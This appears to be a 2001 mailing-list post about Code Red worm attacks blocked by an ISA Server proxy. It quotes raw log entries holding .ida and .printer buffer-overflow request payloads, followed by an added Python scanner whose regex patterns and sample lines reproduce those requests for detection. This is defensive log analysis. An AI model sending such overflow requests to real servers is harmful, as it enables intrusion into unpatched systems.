Wow, don't know what happened to those last emails.

After a few days of portscans (all successfully blocked) I finally started getting Code Red attacks. Some interesting info on the attacks. A few of the source IPs have been pretty thorough about hitting every possible combination in the ObjectName field. Regardless of their configuration all attempts have been blocked.

From a few of the log entries - Initial portion of ObjectName field
***************************************************************************
http://www.worm.com/default.ida
http://207.225.151.2/default.ida      ISA external IP address
http://207.225.151.1/default.ida      ISA external IP address
http://TANIS/default.ida              an internal web server name (not sure how that was gotten. Although, I was in the process of setting up a new site and IPs (ISAs and the web servers) around the time some of the requests hit). ????

This is the log entry of a standard Code Red
***************************************************
207.91.144.219, anonymous, -, N, 8/5/2001, 9:46:00, W3ReverseProxy, PALIN, -, www.worm.com, -, 0, 3966, 4039, 0, -, TCP, GET, http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a, -, -, 12202, 0x0, Default rule, -

Check out the end of the ObjectName field in this one (/NULL.printer). Not a standard Code Red but looks like they attempt a buffer overrun.
***************************************************************************
216.29.225.188, anonymous, -, N, 8/5/2001, 10:23:34, W3ReverseProxy, PALIN, -, ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ3ÃÂÂÃââ@`3ÃÂ$ÃÃÃÃÂÂÂ1Åj, -, 0, 80, 1182, 0, -, TCP, GET, http://ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ;ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ3ÃÂÂÃââ@`3ÃÂ$ÃÃÃÃÂÂÂ1Åj/NULL.printer, -, -, 12202, 0x0, Default rule, -

Michael

"Never attribute to malice that which can be adequately explained by stupidity."
Hanlon's Razor

-----Original Message-----
From: Tim Buenz [mailto:tbuenz@xxxxxxxxxxxxxxxxxxxxxxxxxxxx]
Sent: Sunday, August 05, 2001 11:25 AM
To: [ISAserver.org Discussion List]
Subject: [isalist] RE: FW: Alert: New version of Code Red, XXXX
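Added example, not part of the post above or of ISA Server itself: a small scanner that reads W3ReverseProxy log lines of the shape quoted in the post and flags the two request types it shows, the standard Code Red `/default.ida?NNN...%u...` request and the `/NULL.printer` request whose host part is hundreds of bytes of binary. The field layout is inferred from the two quoted entries; the sample lines are constructed (payloads shortened, the high-bit bytes replaced by a run of `\xc2`), the 253-character host threshold is this example's assumption (the maximum length of a valid DNS name), and matching an `X` filler as well as `N` goes beyond the post to cover the Code Red II variant. It also collects, per source, which URL hosts were tried, which is how you would spot the "thorough" sources the post mentions.

```python
"""Flag Code Red style requests in ISA Server W3ReverseProxy log lines.

Added example, not from the original post.  Field layout inferred from the
two log entries quoted there; thresholds and sample data are assumptions.
"""
import re
from collections import Counter, defaultdict
from typing import Dict, Optional

# Layout seen in the post: source IP, user, -, N, date, time, service, server,
# -, host field, ..., protocol, method, URL, -, -, result code, 0x0, rule, -.
# The URL is matched lazily and the line end is anchored so binary junk
# inside the URL cannot shift the trailing fields.
LOG_RE = re.compile(
    r"^(?P<src>[^,]+), [^,]*, [^,]*, [^,]*, (?P<date>[^,]*), (?P<time>[^,]*), "
    r".*?, (?P<method>GET|POST|HEAD), (?P<url>.+?), [^,]*, [^,]*, "
    r"(?P<status>[^,]*), [^,]*, (?P<rule>[^,]*), [^,]*$"
)

# Code Red .ida request: a long filler run of one repeated letter after
# "default.ida?" followed by %uXXXX escapes.  The post shows the 'N' filler;
# 'X' is the Code Red II variant (assumption: 100+ filler characters).
IDA_OVERFLOW_RE = re.compile(r"/default\.ida\?([NX])\1{99,}.*%u[0-9a-f]{4}", re.IGNORECASE)

# The /NULL.printer entry carries a host part of several hundred high-bit
# bytes.  No valid DNS name exceeds 253 characters, so a longer host on a
# .printer request is treated as an overflow attempt (assumed threshold).
MAX_DNS_NAME = 253
HOST_RE = re.compile(r"^https?://(?P<host>[^/]*)", re.IGNORECASE)
PRINTER_RE = re.compile(r"\.printer$", re.IGNORECASE)

# Constructed sample lines modelled on the post's entries (payloads shortened).
SAMPLE_LOG = [
    "207.91.144.219, anonymous, -, N, 8/5/2001, 9:46:00, W3ReverseProxy, PALIN, -, "
    "www.worm.com, -, 0, 3966, 4039, 0, -, TCP, GET, http://www.worm.com/default.ida?"
    + "N" * 224 + "%u9090%u6858%ucbd3%u7801%u9090%u00=a, -, -, 12202, 0x0, Default rule, -",
    "216.29.225.188, anonymous, -, N, 8/5/2001, 10:23:34, W3ReverseProxy, PALIN, -, "
    + "\xc2" * 300 + ", -, 0, 80, 1182, 0, -, TCP, GET, http://" + "\xc2" * 300
    + "/NULL.printer, -, -, 12202, 0x0, Default rule, -",
    "10.0.0.5, anonymous, -, N, 8/5/2001, 10:30:00, W3ReverseProxy, PALIN, -, "
    "www.example.test, -, 0, 512, 2048, 0, -, TCP, GET, http://www.example.test/index.html, "
    "-, -, 200, 0x0, Allow rule, -",
    # Same worm source again, this time aiming at the ISA external IP from the post.
    "207.91.144.219, anonymous, -, N, 8/5/2001, 9:47:12, W3ReverseProxy, PALIN, -, "
    "207.225.151.2, -, 0, 3966, 4039, 0, -, TCP, GET, http://207.225.151.2/default.ida?"
    + "N" * 224 + "%u9090%u6858%ucbd3%u7801%u00=a, -, -, 12202, 0x0, Default rule, -",
]


def classify(line: str) -> Optional[Dict[str, str]]:
    """Parse one log line and attach a verdict; None if the line does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    url = rec["url"]
    hm = HOST_RE.match(url)
    rec["host"] = hm.group("host") if hm else ""
    path_only = url.split("?", 1)[0]
    if IDA_OVERFLOW_RE.search(url):
        rec["verdict"] = "code-red-ida-overflow"
    elif PRINTER_RE.search(path_only) and len(rec["host"]) > MAX_DNS_NAME:
        rec["verdict"] = "printer-isapi-overflow"
    else:
        rec["verdict"] = "benign"
    return rec


def summarize(lines):
    """Verdict counts per source IP and the URL hosts each hostile source tried."""
    counts = defaultdict(Counter)
    hosts = defaultdict(set)
    for line in lines:
        rec = classify(line)
        if rec is None:
            continue
        counts[rec["src"]][rec["verdict"]] += 1
        if rec["verdict"] != "benign":
            hosts[rec["src"]].add(rec["host"][:40])  # truncate binary hosts for display
    return counts, hosts


if __name__ == "__main__":
    counts, hosts = summarize(SAMPLE_LOG)
    for src, c in counts.items():
        print(src, dict(c), sorted(hosts.get(src, ())))
```

Run it against a real ISA export by replacing SAMPLE_LOG with the file's lines; entries that do not match the layout are skipped rather than misread, and the per-source host set shows which names (www.worm.com, the proxy's external IPs, internal server names) a given source cycled through.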